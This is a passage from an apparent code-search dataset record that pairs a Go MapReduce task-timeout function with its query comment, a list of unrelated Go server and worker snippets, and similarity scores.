configured.\n\tif pr.rdsServer != nil {\n\t\tgo pr.rdsServer.Start(ctx, dataChan)\n\t}\n\n\t// Start RTC reporter if configured.\n\tif pr.rtcReporter != nil {\n\t\tgo pr.rtcReporter.Start(ctx)\n\t}\n\n\tif pr.c.GetDisableJitter() {\n\t\tfor _, p := range pr.Probes {\n\t\t\tgo p.Start(ctx, dataChan)\n\t\t}\n\t\treturn\n\t}\n\tpr.startProbesWithJitter(ctx, dataChan)\n}", "func (w Worker) Start() {\n\tgo func() {\n\t\tfor {\n\t\t\t// register the current worker into the worker queue.\n\t\t\tw.WorkerPool <- w.JobChannel\n\n\t\t\tselect {\n\t\t\tcase job := <-w.JobChannel:\n\t\t\t\t// we have received a work request.\n\t\t\t\tif err := job.Do(); err != nil {\n\t\t\t\t\tlog.Printf(\"Error job.Do() : %v\\n\", err.Error())\n\t\t\t\t}\n\n\t\t\tcase <-w.quit:\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func main() {\n\tlis, err := net.Listen(\"tcp\", port)\n\tif err != nil {\n\t\tlog.Fatalf(\"Failed to start gRPC server: %v\", err)\n\t}\n\n\t// Creates a new gRPC server\n\tsrvr := grpc.NewServer()\n\tds := crawlerDS{visitedUrls: make(map[string]bool),\n\t\turlOnChannel: make(map[string]bool),\n\t\tsiteURLIndex: make(map[string]*linkIndex),\n\t\tsiteIndex: 0,\n\t\tfinishedUrls: make(chan string),\n\t\tsiteIndexURL: make(map[int]string),\n\t\twaitingUrls: make(chan linkIndex),\n\t\tterminate: make([]*chan int, 0)}\n\n\twg.Add(1)\n\tgo ds.startCrawling()\n\n\tpb.RegisterCrawlerServer(srvr, &server{spiderPtr: &ds})\n\tsrvr.Serve(lis)\n}", "func spawnListener(addr string) {\n\tfmt.Println(addr)\n\n\tbRPC := new(BrokerRPCServer)\n\tserver := rpc.NewServer()\n\tserver.Register(bRPC)\n\n\ttcpAddr, err := net.ResolveTCPAddr(\"tcp\", \"0.0.0.0:8000\")\n\t// tcpAddr, err := net.ResolveTCPAddr(\"tcp\", config.BrokerIP)\n\tif err != nil {\n\t\tfmt.Fprintf(os.Stderr, err.Error())\n\t}\n\n\tlistener, err := net.ListenTCP(\"tcp\", tcpAddr)\n\tif err != nil {\n\t\tfmt.Fprintf(os.Stderr, err.Error())\n\t}\n\n\tfmt.Printf(\"Serving Server at: %v\\n\", config.BrokerIP)\n\n\tvrpc.ServeRPCConn(server, listener, logger, loggerOptions)\n}", "func handleRpcConnection() {\n\n\tfortuneServerRPC := new(FortuneServerRPC)\n\trpc.Register(fortuneServerRPC)\n\n\ttcpAddress, err := net.ResolveTCPAddr(\"tcp\", fserverTcpG)\n\thandleError(err)\n\n\t// Listen for Tcp connections\n\tln, err := net.ListenTCP(\"tcp\", tcpAddress)\n\thandleError(err)\n\n\tfor {\n\n\t\tconn, err := ln.AcceptTCP()\n\t\thandleError(err)\n\t\tgo rpc.ServeConn(conn)\n\t}\n\n\tln.Close()\n}", "func (h *Host) threadedListen(closeChan chan struct{}) {\n\tdefer close(closeChan)\n\n\t// Receive connections until an error is returned by the listener. When an\n\t// error is returned, there will be no more calls to receive.\n\tfor {\n\t\t// Block until there is a connection to handle.\n\t\tconn, err := h.listener.Accept()\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\n\t\tgo h.threadedHandleConn(conn)\n\n\t\t// Soft-sleep to ratelimit the number of incoming connections.\n\t\tselect {\n\t\tcase <-h.tg.StopChan():\n\t\tcase <-time.After(rpcRatelimit):\n\t\t}\n\t}\n}", "func main() {\n\tvar (\n\t\terr error\n\t\tlis net.Listener\n\t)\n\tif lis, err = net.Listen(\"tcp\", env.MustHget(\"mail\", \"addr\")); err != nil {\n\t\tdie(err)\n\t}\n\n\tsrv := grpc.NewServer()\n\tpb.RegisterMailServiceServer(srv, &mailServer{})\n\tif err = srv.Serve(lis); err != nil {\n\t\tdie(err)\n\t}\n}", "func (s *grpcServer) Run(ctx context.Context, ready func()) error {\n\tlogger := log.WithContext(ctx)\n\ts.server.Init(ctx, nil)\n\tlistener, err := net.Listen(\"tcp\", s.cfg.Address)\n\tif err != nil {\n\t\tlogger.WithError(err).WithField(\"address\", s.cfg.Address).Error(\"unable to listen tcp address\")\n\t\treturn err\n\t}\n\n\tlogger.Info(\"starting of grpc server...\")\n\ts.server.Init(ctx, nil)\n\tmaster.RegisterMasterServer(s.server.server, s.server)\n\tif err := s.server.server.Serve(listener); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func init() {\r\n\tmux := http.NewServeMux()\r\n\trpcserver.RegisterRPCFuncs(mux, Routes)\r\n\twm := rpcserver.NewWebsocketManager(Routes, nil)\r\n\tmux.HandleFunc(websocketEndpoint, wm.WebsocketHandler)\r\n\tgo func() {\r\n\t\t_, err := rpcserver.StartHTTPServer(tcpAddr, mux)\r\n\t\tif err != nil {\r\n\t\t\tpanic(err)\r\n\t\t}\r\n\t}()\r\n\r\n\tmux2 := http.NewServeMux()\r\n\trpcserver.RegisterRPCFuncs(mux2, Routes)\r\n\twm = rpcserver.NewWebsocketManager(Routes, nil)\r\n\tmux2.HandleFunc(websocketEndpoint, wm.WebsocketHandler)\r\n\tgo func() {\r\n\t\t_, err := rpcserver.StartHTTPServer(unixAddr, mux2)\r\n\t\tif err != nil {\r\n\t\t\tpanic(err)\r\n\t\t}\r\n\t}()\r\n\r\n\t// wait for servers to start\r\n\ttime.Sleep(time.Second * 2)\r\n\r\n}", "func (svr *Server) Start() (err error) {\n\n\tfor {\n\t\tcliConn, err := svr.listener.Accept()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// save connection\n\t\tsvr.mtx.Lock()\n\t\tsvr.connList.PushBack(cliConn)\n\t\tsvr.mtx.Unlock()\n\n\t\tsvr.logger.Debug(\"Accept new connection\", \"RemoteAddr\", cliConn.RemoteAddr())\n\t\tgo svr.readRequest(cliConn)\n\t}\n}", "func (c *raftClient) run(ctx context.Context, wg *sync.WaitGroup, n *Node) {\n\tdefer wg.Done()\n\n\tn.logger.Debugw(\"remote node client worker start running\", c.logKV()...)\n\n\t// Add grpc client interceptor for logging, and metrics collection (if enabled). We do not use payload logging\n\t// because it is currently nailed to InfoLevel.\n\tgcl := n.logger.Named(\"GRPC_C\").Desugar()\n\tunaryInterceptorChain := []grpc.UnaryClientInterceptor{}\n\tif c.node.verboseLogging {\n\t\tunaryInterceptorChain = append(unaryInterceptorChain,\n\t\t\tgrpc_zap.UnaryClientInterceptor(\n\t\t\t\tgcl, grpc_zap.WithLevels(func(code codes.Code) zapcore.Level { return zapcore.DebugLevel })))\n\t}\n\n\tif n.messaging.clientUnaryInterceptorForMetrics != nil {\n\t\tunaryInterceptorChain = append(unaryInterceptorChain, n.messaging.clientUnaryInterceptorForMetrics)\n\t}\n\n\t// Prepend our options such that they can be overridden by the client options if they overlap.\n\toptions := []grpc.DialOption{\n\t\tgrpc.WithBlock(),\n\t\tgrpc.WithKeepaliveParams(keepalive.ClientParameters{\n\t\t\tTime: time.Second * defaultInactivityTriggeredPingSeconds,\n\t\t\tTimeout: time.Second * defaultTimeoutAfterPingSeconds,\n\t\t}),\n\t\tgrpc.WithUnaryInterceptor(grpc_middleware.ChainUnaryClient(unaryInterceptorChain...))}\n\n\t// Append client provided dial options specifically for this client to server connection.\n\tif n.config.clientDialOptionsFn != nil {\n\t\toptions = append(options, n.config.clientDialOptionsFn(n.messaging.server.localAddr, c.remoteAddress)...)\n\t}\n\n\tconn, err := grpc.DialContext(ctx, c.remoteAddress, options...)\n\tif err != nil {\n\t\tif ctx.Err() == nil {\n\t\t\t// This is not a shutdown. We have taken a fatal error (i.e. this is not a transient error). Possibly\n\t\t\t// a misconfiguration of the options, for example. We will return a fatal error.\n\t\t\tn.logger.Errorw(\"remote node client worker aborting\", append(c.logKV(), raftErrKeyword, err)...)\n\t\t\tn.signalFatalError(raftErrorf(\n\t\t\t\tRaftErrorClientConnectionUnrecoverable, \"grpc client connection to remote node, err [%v]\", err))\n\t\t}\n\t\treturn\n\t}\n\n\tdefer func() { _ = conn.Close() }()\n\n\tn.logger.Debugw(\"remote node client worker connected\",\n\t\tappend(c.logKV(), \"connState\", conn.GetState().String())...)\n\tc.grpcClient = raft_pb.NewRaftServiceClient(conn)\n\n\tfor {\n\t\tselect {\n\t\tcase e := <-c.eventChan.channel:\n\t\t\t// The event handler carries all the context necessary, and equally handles the\n\t\t\t// feedback based on the outcome of the event.\n\t\t\te.handle(ctx)\n\n\t\tcase <-ctx.Done():\n\t\t\t// We're done. By this point we will have cleaned up and we're ready to go.\n\t\t\tn.logger.Debugw(\"remote node client worker shutting down\", c.logKV()...)\n\t\t\treturn\n\t\t}\n\n\t}\n\n}", "func (stub *RunnerStub) StartListeningAndBlock(ctx context.Context, commandrunner <-chan int) error {\n\n\tstub.channel.NatsNativeConn.Subscribe(stub.channel.NatsPublishName, func(msg *natsio.Msg) {\n\t\tcarrier := requests.RequestCarrier{}\n\n\t\tif err := json.Unmarshal(msg.Data, &carrier); err != nil {\n\t\t\tlog := fmt.Errorf(\"[Error]: stub: unable to unmarshal command from json: %s\", err)\n\t\t\tfmt.Println(log)\n\t\t}\n\n\t\tswitch carrier.CarrierForType {\n\t\tcase requests.RunnerCancel:\n\t\t\tstub.cancellationHandler()\n\t\tcase requests.RunnerHealth:\n\t\t\tisHealthy := stub.healthyHandler()\n\t\t\trply := requests.NewRunnerHealthRequest()\n\t\t\trply.IsHealthy = isHealthy\n\t\t\tcarrier.Data = rply\n\n\t\t\tif json, err := json.Marshal(carrier); err != nil {\n\t\t\t\tmsg.Respond(json)\n\t\t\t} else {\n\t\t\t\tlog := fmt.Errorf(\"[Error]: stub: unable to marshal command from json: %s\", err)\n\t\t\t\tfmt.Println(log)\n\t\t\t}\n\t\t}\n\t})\n\n\tselect {\n\tcase <-commandrunner:\n\t}\n\treturn nil\n}", "func servidor(in chan Request, fim chan int) {\r\n\t\t\r\n\tfor {\r\n\t\t// le requisicao do cliente\r\n\t\treq := <-in\r\n\r\n\t\t// acha uma thread disponivel para \r\n\t\t// enviar a requisicao\r\n\t\tvar canal Thread = achaCanal()\r\n\r\n\t\t// envia requisicao para a thread\r\n\t\tcanal.thr <- req\r\n\t}\r\n}", "func StartRPC() {\n\t/*\n\t * Will register the user auth rpc with rpc package\n\t * We will listen to the http with rpc of auth module\n\t * Then we will start listening to the rpc port\n\t */\n\t//Registering the auth model with the rpc package\n\trpc.Register(new(aConfig.RPCAuth))\n\n\t//registering the handler with http\n\trpc.HandleHTTP()\n\tl, e := net.Listen(\"tcp\", \":\"+RPCPort)\n\tif e != nil {\n\t\tlog.Fatal(\"Error while listening to the rpc port\", e.Error())\n\t}\n\tgo http.Serve(l, nil)\n}", "func Run() (err error) {\n\n\t// Register Message Queue handler\n\thandler := mq.MsgHandler{Handler: msgHandler, UserData: nil}\n\tsbi.handlerId, err = sbi.mqLocal.RegisterHandler(handler)\n\tif err != nil {\n\t\tlog.Error(\"Failed to register local Msg Queue listener: \", err.Error())\n\t\treturn err\n\t}\n\tlog.Info(\"Registered local Msg Queue listener\")\n\n\treturn nil\n}", "func (s *Server) Start(ctx context.Context, cfg config.Config) error {\n\ts.mtx.Lock()\n\n\tcmtCfg := tmrpcserver.DefaultConfig()\n\tcmtCfg.MaxOpenConnections = int(cfg.API.MaxOpenConnections)\n\tcmtCfg.ReadTimeout = time.Duration(cfg.API.RPCReadTimeout) * time.Second\n\tcmtCfg.WriteTimeout = time.Duration(cfg.API.RPCWriteTimeout) * time.Second\n\tcmtCfg.MaxBodyBytes = int64(cfg.API.RPCMaxBodyBytes)\n\n\tlistener, err := tmrpcserver.Listen(cfg.API.Address, cmtCfg.MaxOpenConnections)\n\tif err != nil {\n\t\ts.mtx.Unlock()\n\t\treturn err\n\t}\n\n\ts.listener = listener\n\ts.mtx.Unlock()\n\n\t// configure grpc-web server\n\tif cfg.GRPC.Enable && cfg.GRPCWeb.Enable {\n\t\tvar options []grpcweb.Option\n\t\tif cfg.API.EnableUnsafeCORS {\n\t\t\toptions = append(options,\n\t\t\t\tgrpcweb.WithOriginFunc(func(origin string) bool {\n\t\t\t\t\treturn true\n\t\t\t\t}),\n\t\t\t)\n\t\t}\n\n\t\twrappedGrpc := grpcweb.WrapServer(s.GRPCSrv, options...)\n\t\ts.Router.PathPrefix(\"/\").Handler(http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) {\n\t\t\tif wrappedGrpc.IsGrpcWebRequest(req) {\n\t\t\t\twrappedGrpc.ServeHTTP(w, req)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// Fall back to grpc gateway server.\n\t\t\ts.GRPCGatewayRouter.ServeHTTP(w, req)\n\t\t}))\n\t}\n\n\t// register grpc-gateway routes (after grpc-web server as the first match is used)\n\ts.Router.PathPrefix(\"/\").Handler(s.GRPCGatewayRouter)\n\n\terrCh := make(chan error)\n\n\t// Start the API in an external goroutine as Serve is blocking and will return\n\t// an error upon failure, which we'll send on the error channel that will be\n\t// consumed by the for block below.\n\tgo func(enableUnsafeCORS bool) {\n\t\ts.logger.Info(\"starting API server...\", \"address\", cfg.API.Address)\n\n\t\tif enableUnsafeCORS {\n\t\t\tallowAllCORS := handlers.CORS(handlers.AllowedHeaders([]string{\"Content-Type\"}))\n\t\t\terrCh <- tmrpcserver.Serve(s.listener, allowAllCORS(s.Router), servercmtlog.CometLoggerWrapper{Logger: s.logger}, cmtCfg)\n\t\t} else {\n\t\t\terrCh <- tmrpcserver.Serve(s.listener, s.Router, servercmtlog.CometLoggerWrapper{Logger: s.logger}, cmtCfg)\n\t\t}\n\t}(cfg.API.EnableUnsafeCORS)\n\n\t// Start a blocking select to wait for an indication to stop the server or that\n\t// the server failed to start properly.\n\tselect {\n\tcase <-ctx.Done():\n\t\t// The calling process canceled or closed the provided context, so we must\n\t\t// gracefully stop the API server.\n\t\ts.logger.Info(\"stopping API server...\", \"address\", cfg.API.Address)\n\t\treturn s.Close()\n\n\tcase err := <-errCh:\n\t\ts.logger.Error(\"failed to start API server\", \"err\", err)\n\t\treturn err\n\t}\n}", "func startHTTPServer(name string, waitChan chan<- WaitEntry, server *http.Server) {\n\tgo func() {\n\t\terr := server.ListenAndServe()\n\n\t\tif err != nil && err != http.ErrServerClosed {\n\t\t\twaitChan <- WaitEntry{\n\t\t\t\tname: name,\n\t\t\t\terr: fmt.Errorf(\"error running http server: %s\", err.Error()),\n\t\t\t}\n\t\t}\n\t}()\n}", "func (c *Connection) Worker() {\n\n\tfor {\n\t\tselect {\n\t\tcase _ = <-c.workerctx.Done():\n\t\t\treturn\n\t\tcase inData := <-c.In:\n\t\t\theader, _ := wire.GetHeader(inData)\n\n\t\t\tif header.CmdType == wire.CMD_EXIT {\n\t\t\t\tos.Exit(0)\n\t\t\t}\n\n\t\t\tlogg.Debug(\"processing server cmd\")\n\n\t\t\tcmdFunc, ok := cmd.CommandBuffer[header.CmdType]\n\t\t\tif !ok {\n\t\t\t\tlogg.Log(\"Command not implemented\")\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tnewctx1, _ := context.WithCancel(c.workerctx)\n\t\t\tgo cmdFunc(inData, c.Out, newctx1)\n\t\t}\n\t}\n\n}", "func main() {\n\t// Listen an actual port.\n\tlis, err := net.Listen(\"tcp\", fmt.Sprintf(\":%d\", 9093))\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to listen: %v\", err)\n\t}\n\tdefer lis.Close()\n\n\t// Create a HTTP server for prometheus.\n\thttpServer := &http.Server{Handler: promhttp.HandlerFor(reg, promhttp.HandlerOpts{}), Addr: fmt.Sprintf(\"0.0.0.0:%d\", 9092)}\n\n\t// Create a gRPC Server with gRPC interceptor.\n\tgrpcServer := grpc.NewServer(\n\t\tgrpc.StreamInterceptor(grpcMetrics.StreamServerInterceptor()),\n\t\tgrpc.UnaryInterceptor(grpcMetrics.UnaryServerInterceptor()),\n\t)\n\n\t// Create a new api server.\n\tdemoServer := newDemoServer()\n\n\t// Register your service.\n\tpb.RegisterDemoServiceServer(grpcServer, demoServer)\n\n\t// Initialize all metrics.\n\tgrpcMetrics.InitializeMetrics(grpcServer)\n\n\t// Start your http server for prometheus.\n\tgo func() {\n\t\tif err := httpServer.ListenAndServe(); err != nil {\n\t\t\tlog.Fatal(\"Unable to start a http server.\")\n\t\t}\n\t}()\n\n\t// Start your gRPC server.\n\tlog.Fatal(grpcServer.Serve(lis))\n}", "func main() {\n\tif len(os.Args) < 2 {\n\t\tlog.Fatalf(\"Usage: %s <port to listen on>\", os.Args[0])\n\t}\n\tport := os.Args[1]\n\n\tfile, _ := os.Open(\"config.json\")\n\tdefer file.Close()\n\tdecoder := json.NewDecoder(file)\n\tconfig := Config{}\n\terr := decoder.Decode(&config)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to get configuration: %v\", err)\n\t}\n\n\n\tlis, err := net.Listen(\"tcp\", fmt.Sprintf(\":%s\", port))\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to listen: %v\", err)\n\t}\n\n\ts := api.Server{\n\t\tn: config.every_nth_request_slow,\n\t\tdelay: config.seconds_delay,\n\t}\n\tgrpcServer := grpc.NewServer()\n\tapi.RegisterRandomStrServer(grpcServer, &s)\n\n\tif err := grpcServer.Serve(lis); err != nil {\n\t\tlog.Fatalf(\"failed to serve: %s\", err)\n\t}\n}", "func (w *worker) Start() {\n\tgo func() {\n\t\tfor {\n\t\t\t// consume done ,then worker reenter workerPool\n\t\t\tw.workerPool <- w.taskChannel\n\t\t\tselect {\n\t\t\tcase task := <-w.taskChannel:\n\t\t\t\t// received a work request and consume it\n\t\t\t\tif err := task.Consume(); err != nil {\n\t\t\t\t\tlog.Printf(\"Task Consume fail: %v\", err.Error())\n\t\t\t\t}\n\t\t\tcase <-w.quit:\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func Start() {\n\t{\n\t\t// Creating a grpc server, use WithInsecure to allow http connections\n\t\tgrpcServer := grpc.NewServer()\n\n\t\t// Creates an instance of Info\n\t\tinfoService := services.NewInfo()\n\n\t\t// Creates an instance of Node\n\t\tnodeService := services.NewNode()\n\n\t\t// This helps clients determine which services are available to call\n\t\treflection.Register(grpcServer)\n\n\t\t// Similar to registering handlers for http\n\t\tprotos.RegisterInfoServer(grpcServer, infoService)\n\n\t\tprotos.RegisterNodeServer(grpcServer, nodeService)\n\n\t\tl, err := net.Listen(\"tcp\", Address)\n\t\tif err != nil {\n\t\t\tklog.Errorf(\"Unable to listen %v\", err)\n\t\t\tos.Exit(1)\n\t\t}\n\n\t\t// Listen for requests\n\t\tklog.Infof(\"Starting server at : %v \", Address)\n\t\terr = grpcServer.Serve(l)\n\t\tif err != nil {\n\t\t\tklog.Errorf(\"Unable to Serve %v\", err)\n\t\t}\n\n\t}\n}", "func StartServer(cleanUpChan chan int){\n\tGrpcServer = &Server{\n CleanUpChan:cleanUpChan ,\n\t GrpcServer: grpc.NewServer(),\n\t}\n\tregisterGrpcServices(GrpcServer.GrpcServer)\n\tif err := GrpcServer.GrpcServer.Serve(getListner(port)); err != nil {\n\t\tpanic(err)\n\t}\n}", "func Run(ctx context.Context, network, address string) error {\n\tlistener, err := net.Listen(network, address)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer func() {\n\t\tif err := listener.Close(); err != nil {\n\t\t\tlog.Fatalf(\"Failed to close %s %s: %v\", network, address, err)\n\t\t}\n\t}()\n\n\tserver := grpc.NewServer()\n\tpb.RegisterEchoServiceServer(server, newEchoServer())\n\n\tgo func() {\n\t\tdefer server.GracefulStop()\n\t\t<-ctx.Done()\n\t}()\n\treturn server.Serve(listener)\n}" ]
[ "0.64237857", "0.63124293", "0.6109769", "0.60422313", "0.5865199", "0.58389354", "0.583757", "0.5834663", "0.58046454", "0.5800697", "0.5778423", "0.5769884", "0.57659143", "0.5764688", "0.57607377", "0.5753001", "0.5745076", "0.5744342", "0.57366085", "0.5727261", "0.5719497", "0.57176346", "0.5716196", "0.5711724", "0.57098144", "0.57095605", "0.5708548", "0.5697447", "0.56926304", "0.56912786", "0.5690821", "0.5690636", "0.5679258", "0.56628263", "0.5660445", "0.56546044", "0.5649454", "0.5636544", "0.56353754", "0.56039685", "0.5603713", "0.560067", "0.55922973", "0.5588971", "0.55762863", "0.5552818", "0.55418557", "0.5539965", "0.55318594", "0.5531173", "0.55277413", "0.55242974", "0.5522838", "0.5522601", "0.55207336", "0.5512613", "0.55001175", "0.54929096", "0.54891557", "0.54857624", "0.5483104", "0.547888", "0.54671425", "0.5462677", "0.54624367", "0.54620373", "0.5460035", "0.545292", "0.5449121", "0.5448405", "0.54472315", "0.5440429", "0.543955", "0.5431873", "0.54243225", "0.54230124", "0.54226786", "0.5422479", "0.5420455", "0.541936", "0.5414998", "0.5411351", "0.540694", "0.53989273", "0.53926057", "0.53922665", "0.5391779", "0.5386621", "0.5378689", "0.5378441", "0.5377204", "0.5371482", "0.53630006", "0.53597265", "0.53574836", "0.5355956", "0.53408253", "0.5337863", "0.5334423", "0.5329888", "0.5328356" ]
0.0
-1
/ should hold lock before enter this func
func (m *Master) mapfinished() bool { t := time.Now().Unix() ret := true j := 0 for j < len(m.mapTasks) { if m.mapTasks[j].state == 1 { if t-m.mapTasks[j].emittime >= TIMEOUT { m.mapTasks[j].state = 0 } } j++ } i := 0 for i < len(m.mapTasks) { if m.mapTasks[i].state == 0 { m.nextmaptask = i break } i++ } for _, mapTask := range m.mapTasks { if mapTask.state != 2 { ret = false break } } return ret }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (e *Enumerate) lock() {\n\te.u.m.Lock()\n}", "func (heap *SkewHeap) lock() { heap.mutex.Lock() }", "func (r *Radix) lock() {\n\tif r.ts {\n\t\tr.mu.Lock()\n\t}\n}", "func (q *RxQueue) lock() {\n\tq.pendingMutex.Lock()\n}", "func (self *Map) lock() {\n\tif self.atomic == nil {\n\t\tself.atomic = new(sync.Mutex)\n\t}\n\n\tself.atomic.Lock()\n}", "func (e *endpointMap) lock() func() {\n\te.mu.Lock()\n\treturn func() { e.mu.Unlock() }\n}", "func (m *MutexSafe) lock() {\n\tm.Mutex.Lock()\n}", "func (*Item) Lock() {}", "func (*NoCopy) Lock() {}", "func (*S) Lock() {}", "func (w *wlockMap) lock(ino uint64) {\n\tw.Lock()\n\tr := w.inodeLocks[ino]\n\tw.Unlock()\n\t// this can take a long time - execute outside the wlockMap lock\n\tr.Lock()\n}", "func Lock() {\n\tlock.Lock()\n}", "func (*noCopy) Lock() {}", "func Lock() {\n\tmutex.Lock()\n}", "func (this *DeployLock) start() {\n\tthis.mutex.Lock()\n\tthis.numStarted++\n\tthis.mutex.Unlock()\n}", "func SyncRuntimeDoSpin()", "func (p *Player) lock() {\n\tp.chLock <- struct{}{}\n}", "func (this *Peer) update() {\n\t// ping the peer\n\t// we do this outside the lock to avoid communication latency in the lock\n\tonline := this.protocol.ping(this.id)\n\n\tthis.mu.Lock()\n\tif online && this.status == STATUS_OFFLINE {\n\t\tLog.Info.Printf(\"Peer %s came online\", this.id.String())\n\t\tthis.status = STATUS_ONLINE\n\t} else if !online && this.status == STATUS_ONLINE {\n\t\tLog.Info.Printf(\"Peer %s went offline\", this.id.String())\n\t\tthis.status = STATUS_OFFLINE\n\t}\n\n\tverificationDelay := 300 * time.Second\n\tif Debug {\n\t\tverificationDelay = time.Second\n\t}\n\n\tvar randomShard *BlockShardId\n\tif time.Now().After(this.lastVerifyTime.Add(verificationDelay)) {\n\t\tthis.lastVerifyTime = time.Now()\n\n\t\t// pick a random shard to verify\n\t\tavailableShards := make([]BlockShardId, 0)\n\t\tfor shardId, available := range this.shardsAccounted {\n\t\t\tif available {\n\t\t\t\tavailableShards = append(availableShards, shardId)\n\t\t\t}\n\t\t}\n\n\t\tif len(availableShards) > 0 {\n\t\t\trandomShard = &availableShards[rand.Intn(len(availableShards))]\n\t\t}\n\t}\n\tthis.mu.Unlock()\n\n\tif randomShard != nil {\n\t\tLog.Debug.Printf(\"Verifying shard %d on peer %s\", *randomShard, this.id.String())\n\t\tbytes, success := this.retrieveShard(*randomShard)\n\n\t\tif !success || !this.fluidBackup.blockStore.VerifyShard(this, *randomShard, bytes) {\n\t\t\t// either we failed to communicate with the peer (if !success),\n\t\t\t// or the peer sent us corrupted shard data (if success)\n\t\t\tfailReason := \"invalid shard data\"\n\t\t\tif !success {\n\t\t\t\tfailReason = \"peer communication failed\"\n\t\t\t}\n\t\t\tLog.Info.Printf(\"Failed verification of shard %d on peer %s: %s\", *randomShard, this.id.String(), failReason)\n\n\t\t\tthis.mu.Lock()\n\t\t\tif success {\n\t\t\t\t// shard is invalid, delete from remote end\n\t\t\t\t// block store will re-assign it already from the verifyshard call, so don't need to do anything else about that\n\t\t\t\tdelete(this.shardsAccounted, *randomShard)\n\t\t\t\tgo this.deleteShard(*randomShard)\n\t\t\t}\n\n\t\t\t// we also check if this peer is failed per our one-day policy, in which case we would want to clear all accounted shards\n\t\t\tthis.verifyFailCount++\n\t\t\tif this.verifyFailCount > 5 && time.Now().After(this.lastVerifySuccessTime.Add(time.Second * VERIFY_FAIL_WAIT_INTERVAL)) {\n\t\t\t\tgo this.terminateAgreement()\n\t\t\t}\n\t\t\tthis.mu.Unlock()\n\n\t\t\t// Decrease trust\n\t\t\tthis.peerList.UpdateTrustPostVerification(this.id, false)\n\t\t} else {\n\t\t\tthis.peerList.UpdateTrustPostVerification(this.id, true)\n\n\t\t\tthis.mu.Lock()\n\t\t\tthis.verifyFailCount = 0\n\t\t\tthis.lastVerifySuccessTime = time.Now()\n\t\t\tthis.mu.Unlock()\n\t\t}\n\t}\n}", "func (d *Dam) Lock() {\n\td.freeze.Lock()\n}", "func initLockNames() {}", "func LockOSThread() {\n}", "func (v *SafeSet) Lock() {\n\tv.mu.Lock()\n}", "func (channelTree *ChannelTree) Lock() {\n\tchannelTree.mutex.Lock()\n}", "func (pb *PBServer) tick() {\n pb.mu.Lock()\n // Your code here\n v := pb.view\n pb.view, _ = pb.vs.Ping(pb.view.Viewnum)\n if pb.view.Viewnum > v.Viewnum && pb.view.Backup != \"\" && pb.me == pb.view.Primary {\n// if v.Backup != pb.view.Backup && pb.view.Backup != \"\" && pb.me == pb.view.Primary {\n args := &CopyArgs{}\n reply := CopyReply{}\n args.KV = pb.kv\n args.Serials = pb.serials\n fmt.Printf(\"######%s copy database\\n\", pb.me)\n for true {\n ok := call(pb.view.Backup, \"PBServer.ForwardComplete\", args, &reply)\n if ok {\n break\n }\n }\n }\n pb.mu.Unlock()\n// DPrintf(\"tick! %s %d\\n\", pb.me, pb.view.Viewnum);\n}", "func (w *Writer) lock() error {\n\tw.mutex.Lock()\n\tif w.tar == nil {\n\t\tw.mutex.Unlock()\n\t\treturn errors.New(\"Internal error: trying to use an already closed tarfile.Writer\")\n\t}\n\treturn nil\n}", "func (c *ChannelBucket) Lock() {\n\tc.mutex.Lock()\n}", "func (f *File) metaLock() {\n\tif f.up == nil {\n\t\tlogf(\"f.elem = %s\\n\", f.dir.elem)\n\t}\n\tassert(f.up != nil)\n\tf.up.lk.Lock()\n}", "func (c Mutex) Lock() {\n\t<-c.ch\n}", "func neighborEntryinitLockNames() {}", "func (h *schedulerHelper) lockCallBack() {\n\tglog.V(3).Infof(\"lockCallBack--Expired lock for pod[%s], parent[%s]\", h.podName, h.controllerName)\n\t// check whether need to do reset scheduler\n\tif !(h.flag) {\n\t\treturn\n\t}\n\n\t// check whether the scheduler has been changed.\n\tscheduler, err := h.getSchedulerName(h.client, h.nameSpace, h.controllerName)\n\tif err != nil || scheduler != h.schedulerNone {\n\t\treturn\n\t}\n\n\t// restore the original scheduler\n\tinterval := defaultUpdateSchedulerSleep\n\ttimeout := time.Duration(defaultRetryMore+1) * interval\n\tutil.RetryDuring(defaultRetryMore, timeout, interval, func() error {\n\t\t_, err := h.updateSchedulerName(h.client, h.nameSpace, h.controllerName, h.scheduler)\n\t\treturn err\n\t})\n\n\treturn\n}", "func writersLock() {\n\tlog.Info(\"Acquiring lock\")\n\tmutex.Lock()\n\tlog.Info(\"Acquired\")\n}", "func (r *RedisDL) lock(ctx context.Context) error {\n\tr.m.Lock()\n\tdefer r.m.Unlock()\n\ttoken, err := randToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\tretry := time.NewTimer(r.opt.LockTimeout)\n\tatts := r.opt.RetryCount + 1\n\tfor {\n\t\tif err := r.storeToken(token); err == nil {\n\t\t\tr.currentToken = token\n\t\t\treturn nil\n\t\t}\n\t\tif atts--; atts <= 0 {\n\t\t\treturn fmt.Errorf(\"unable to generate token\")\n\t\t}\n\t\tselect {\n\t\tcase <-ctx.Done():\n\t\t\treturn ctx.Err()\n\t\tcase <-retry.C:\n\t\t}\n\t}\n}", "func event() {\n lock.Lock()\n defer lock.Unlock()\n if group != nil {\n group.Event()\n }\n}", "func (m *neighborEntryRWMutex) Lock() {\n\tlocking.AddGLock(neighborEntryprefixIndex, -1)\n\tm.mu.Lock()\n}", "func (g *Github) modLock() {\n\tg.modMutex.Lock()\n\tshouldWait := time.Second - time.Since(g.lastModRequest)\n\tif shouldWait > 0 {\n\t\tlog.Debugf(\"Waiting %s to not hit GitHub ratelimit\", shouldWait)\n\t\ttime.Sleep(shouldWait)\n\t}\n}", "func (vs *versionSet) logLock() {\n\t// Wait for any existing writing to the manifest to complete, then mark the\n\t// manifest as busy.\n\tfor vs.writing {\n\t\tvs.writerCond.Wait()\n\t}\n\tvs.writing = true\n}", "func (l *LockedOrca) getlock(key []byte, read bool) sync.Locker {\n\th := l.hpool.Get().(hash.Hash32)\n\th.Reset()\n\n\t// Calculate bucket using hash and 